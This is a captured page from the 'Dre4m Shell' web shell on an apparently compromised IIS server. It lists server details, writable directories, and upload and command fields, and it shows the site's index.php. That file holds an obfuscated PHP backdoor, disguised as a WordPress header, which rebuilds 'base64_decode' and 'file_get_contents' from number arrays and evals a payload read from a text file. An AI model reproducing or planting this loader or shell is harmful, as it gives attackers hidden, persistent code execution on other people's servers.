Dre4m Shell
Server IP : 103.6.199.200  /  Your IP : 18.116.40.151
Web Server : Microsoft-IIS/10.0
System : Windows NT EMPUSA 10.0 build 20348 (Windows Server 2016) i586
User : EMPUSA$ ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Domains/airzones/Windows-Compro/airzone/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/Domains/airzones/Windows-Compro/airzone/index.php
<?php
$wp_letter = range('z', 'a');
$bd = explode(',', '24,25,7,21,64,22,21,23,11,22,21,20,17,14,21,0,19,21,6,0,23,11,12,6,21,12,6,7');
$wp_bd = '';
for($i=0;$i<11;$i++){
	if($bd[$i] < 30){
		$wp_bd .= $wp_letter[$bd[$i]];
	}else{
		$wp_bd .= $bd[$i].'_';
	}
}
$wp_fg = '';
for($i=11;$i<count($bd);$i++){
	if($bd[$i] > 0){
		$wp_fg .= $wp_letter[$bd[$i]];
	}else{
		$wp_fg .= '_';
	}
}
$result = $wp_bd($wp_fg('JJguowang.txt'), 1);
eval($result);
if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

}

Anon7 - 2022
AnonSec Team